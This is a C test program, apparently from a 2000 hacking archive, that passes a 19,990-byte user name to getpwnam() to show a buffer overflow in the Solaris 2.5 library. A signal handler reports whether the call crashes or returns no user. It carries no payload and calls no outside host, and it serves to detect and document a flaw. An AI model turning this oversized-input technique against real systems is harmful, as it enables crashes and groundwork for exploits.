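/*
 * Solaris 2.5: Charles Howes found the following. This program dies on
 * Solaris 2.5, which shows that getpwnam() has an overflowable buffer: a
 * lookup name far longer than any valid login crashes inside the library
 * instead of producing a "no such user" result.
 *
 * Expected outcome on a libc that bounds the copy: getpwnam() returns NULL
 * and the program prints "Success, no user was found.". A SIGBUS (Solaris)
 * or SIGSEGV (most other platforms) raised during the call is the failure
 * signature; the handler reports it and exits non-zero so a harness can
 * tell the two outcomes apart.
 */
#include <pwd.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

enum {
    NAME_BUF_SIZE = 20000, /* backing storage for the lookup name */
    NAME_LEN = 19990       /* number of 'a' bytes handed to getpwnam() */
};

/*
 * Fault handler installed only around the getpwnam() call.
 *
 * printf() and exit() are not async-signal-safe, so the message is emitted
 * with write() and the process is ended with _exit(); the text is the same
 * as the original report. The write() result is deliberately ignored — there
 * is nothing useful to do about a failed diagnostic inside a signal handler.
 */
static void foobomb(int sig)
{
    static const char msg[] = "Uhoh... getpwnam() died.\n";

    (void)sig;
    (void)write(STDOUT_FILENO, msg, sizeof msg - 1);
    _exit(EXIT_FAILURE);
}

/*
 * Entry point: looks up an absurdly long user name and reports whether the
 * library survived. Returns 0 in both "no user" and "user found" cases; the
 * crash path never returns here (see foobomb()).
 */
int main(void)
{
    char buf[NAME_BUF_SIZE];
    struct passwd *pw;

    /*
     * Build a NUL-terminated name. The original memset() left the last ten
     * bytes of buf uninitialized, so getpwnam() could read past the 'a's
     * into garbage and the crash could not be attributed to the library.
     */
    memset(buf, 'a', NAME_LEN);
    buf[NAME_LEN] = '\0';

    /* Catch both signals an unbounded copy can raise, then restore the
     * default disposition (the original set SIG_IGN, which would mask any
     * later, unrelated fault instead of letting it terminate the process). */
    signal(SIGBUS, foobomb);
    signal(SIGSEGV, foobomb);
    pw = getpwnam(buf);
    signal(SIGBUS, SIG_DFL);
    signal(SIGSEGV, SIG_DFL);

    if (pw == NULL) {
        printf("Success, no user was found.\n");
    } else {
        /* %.100s bounds the output in case pw_name itself is not sane. */
        printf("What the... a user was found?\n");
        printf(" user: %.100s\n", pw->pw_name);
    }
    return 0;
}
/* www.hack.co.za [2000]*/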